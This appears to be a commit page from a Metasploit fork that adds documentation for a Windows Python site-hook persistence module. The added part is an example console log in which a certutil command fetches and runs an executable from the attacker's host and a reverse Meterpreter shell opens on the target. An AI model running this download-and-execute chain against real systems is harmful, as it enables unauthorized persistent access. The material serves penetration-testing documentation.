adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Fixes Windows persistence

Browse Source
This commit is contained in:
Martin Sutovsky
2025-11-19 07:52:54 +01:00
parent ec8906bbd4
commit 197dbf921d
2 changed files with 36 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/multi/persistence/python_site_specific_hook.md
+33 -1
View File
@@ -5,7 +5,6 @@ This module leverages Python's startup mechanism, where some files can be automi
## Verification Steps
Example steps in this format (is also in the PR):
1. Start msfconsole
1. Get a session
1. Do: `use multi/persistence/python_site_specific_hook`
@@ -63,5 +62,38 @@ Server username: ms
### Windows 10.0.15063
```
msf exploit(multi/persistence/python_site_specific_hook) > run verbose=true
[*] Command to run on remote host: certutil -urlcache -f http://192.168.3.7:8080/P0P_l8MTdDPpi4BXoUKxZw %TEMP%\RAKYJqUXyJK.exe & start /B %TEMP%\RAKYJqUXyJK.exe
[*] Exploit running as background job 7.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/python_site_specific_hook) >
[*] Fetch handler listening on 192.168.3.7:8080
[*] HTTP server started
[*] Adding resource /P0P_l8MTdDPpi4BXoUKxZw
[*] Started reverse TCP handler on 192.168.3.7:9999
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Python is present on the system
[*] Detected Python version 3.13
[*] Got path to site-specific hooks C:\Users\msfuser/AppData/Local/Programs/Python/Python313/Lib/site-packages/
[*] Client 10.5.132.155 requested /P0P_l8MTdDPpi4BXoUKxZw
[*] Sending payload to 10.5.132.155 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.155 requested /P0P_l8MTdDPpi4BXoUKxZw
[*] Sending payload to 10.5.132.155 (CertUtil URL Agent)
[*] Sending stage (230982 bytes) to 10.5.132.155
[*] Meterpreter session 3 opened (192.168.3.7:9999 -> 10.5.132.155:51726) at 2025-11-19 07:52:00 +0100
msf exploit(multi/persistence/python_site_specific_hook) > sessions 3
[*] Starting interaction with 3...
meterpreter > sysinfo
Computer : WIN10_1703_1018
OS : Windows 10 1703 (10.0 Build 15063).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: WIN10_1703_1018\msfuser
```